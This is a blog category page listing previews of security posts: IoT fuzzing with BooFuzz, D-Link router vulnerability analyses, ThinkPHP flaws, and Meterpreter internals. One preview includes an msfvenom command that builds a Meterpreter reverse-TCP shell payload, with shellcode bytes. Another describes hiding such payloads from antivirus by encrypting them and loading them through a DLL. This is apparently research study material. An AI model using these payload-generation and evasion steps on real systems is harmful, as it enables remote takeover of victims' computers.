![](https://img-blog.csdnimg.cn/20201014180756724.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全
文章平均质量分 86
「已注销」
这个作者很懒,什么都没留下…
展开
-
IOT Fuzz 两种思路
两种 FUZZ 框架介绍代码和测试用例基于BooFuzz做网络协议黑盒FuzzBooFuzz框架https://boofuzz.readthedocs.io/en/stable/user/quickstart.htmlhttps://github.com/jtpereyda/boofuzzBoofuzz是久经世故的Sulley Fuzz的分支和继承者。除了大量的错误修复,boofuzz的目标是可扩展性。目标是:Fuzz一切。基于BooFuzz做Ftp服务FuzzBooFuzz是基于状态和数据原创 2021-05-24 17:45:00 · 2719 阅读 · 1 评论 -
D-Link系列家用路由器漏洞分析总结
D-Link系列家用路由器漏洞分析总结⚡ 尚未了解清楚❗ 已编写好完整POC❓ 未能编写完整POC❌ 暂时不能实际验证DCS-2530LCVE-2020-25078 ❗ 敏感信息泄露D-Link DCS-1100 || DCS-1130CVE-2017-8416 ⚡DIR-850Lcgi动态web服务器CVE-2017-3193 ❗ 认证前栈溢出CVE-2017-14421 ❗ 路由器后门DIR-816独立web服务器CVE-2021-27114 ❓ 认证后栈溢出CVE原创 2021-04-27 15:49:44 · 2184 阅读 · 0 评论 -
D-Link DSL-2640B 固件漏洞分析
D-Link DSL-2640B 固件漏洞分析/bin/cfm 是整个系统服务的核心程序主函数启动过程由init函数完成初始化过程g_fnInitialize 保存了一系列 init 函数BcmWs_Init 关于 Web的初始化过程webmain函数负责web服务器 ,初始部分做了许多有关socket的控制,直接看对http请求的处理过程这部分处理了http头几处限制,不准进行目录穿越这部分代码依据请求文件后缀,分发处理函数web句柄数据结构 可以理解为struc原创 2021-04-23 18:20:26 · 399 阅读 · 0 评论 -
从meterpreter工作原理到免杀方式的分析
Meterpreter 工作原理msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=31012 -f c > test2.cunsigned char buf[] ="\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x89\xe5""\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4原创 2021-03-05 01:43:42 · 1247 阅读 · 1 评论 -
msfvenom payload 免杀简单实践
免杀简单实践实验各种渗透框架的后门,结果很多文件放到硬盘上就开始报毒,这样的话根本很难实际使用,网上搜索各种免杀工具,据发布有些时间的似乎也都不行,自己稍微熟悉点的可能是dll这一块,看到有通过加密payload然后再打包成dll,最后用regsvr32 加载执行的思路,感觉可以是实践下,好歹这个可以自己写下程序。选择payload这里选择msf的经典payload:windows/meterpreter/reverse_tcp//生成c形式的payloadmsfvenom -a x86 -原创 2021-02-22 13:45:18 · 916 阅读 · 0 评论 -
thinkphp漏洞浅析随笔
thinkphpThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业产品发布/销售。菜鸡的迷惑ThinkPHP时php平台上的MVC框架,MVC框架都包含对路由各种定制功能,菜鸡也曾在hellowo原创 2021-02-19 17:18:13 · 404 阅读 · 0 评论